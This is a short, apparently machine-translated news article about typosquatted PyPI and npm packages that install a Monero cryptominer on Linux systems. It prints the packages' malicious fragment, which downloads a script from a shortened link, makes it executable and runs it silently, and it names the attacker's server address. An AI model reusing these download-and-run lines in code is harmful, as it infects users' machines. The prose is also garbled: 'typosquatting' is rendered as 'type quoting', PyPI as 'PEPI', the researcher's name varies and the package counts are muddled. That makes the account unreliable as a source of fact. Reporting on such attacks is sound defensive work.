Virus creators keep on creating new viruses day by day and use them to their advantage, in this sequence once again security experts discovered some malware in PyPI and npm repositories, which was very surprising, above 200 npm packages of Key use type quoting that contain crypto-currency miners for Linux operating systems.
Hawke Lubbers, an independent researcher at the Department of Information Security, first noticed this problem and found that “at least 33 packages” are being used on PEPI, and not only that, it is very easy to use the XMRIG miner, Which is also used to easily mine the Monero crypto-currency.
Let me tell you that generally, any developers download any package into the system through the terminal, in which typo is very common, if I understand this thing with example, then malware has copied React, argparse and AIOHTTP. Now let’s understand that the user had downloaded the package by misspelling the name of the original popular package for whatever reason, as I will clarify that type quoting was used to distribute those packages to different locations.
The most surprising thing is that when Hawke Lubers came to know about all these things and was giving information about it to the PEPI administration, at the same time the attacker suddenly displayed his arrogance by using 22 other Malicious packages with the same payload.
Apart from all this, the researcher specifically states that all these malicious packages were targeted specifically on Linux systems and not only that a code fragment was found in all these packages which allowed Bit.ly URL Shortening Web to download Bash script from the servers of these notorious attackers through the service:
os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
So the same Mr. Hawke Lubers has revealed that bit.ly forcibly redirects the URL to 80.78.25[.]140:8000 and then sends this script to its operator, that is, to the attacker, to the encrypted IP of the compromised host and informs about the address as well as the successful deployment of the miner very cleverly.
You can also read:
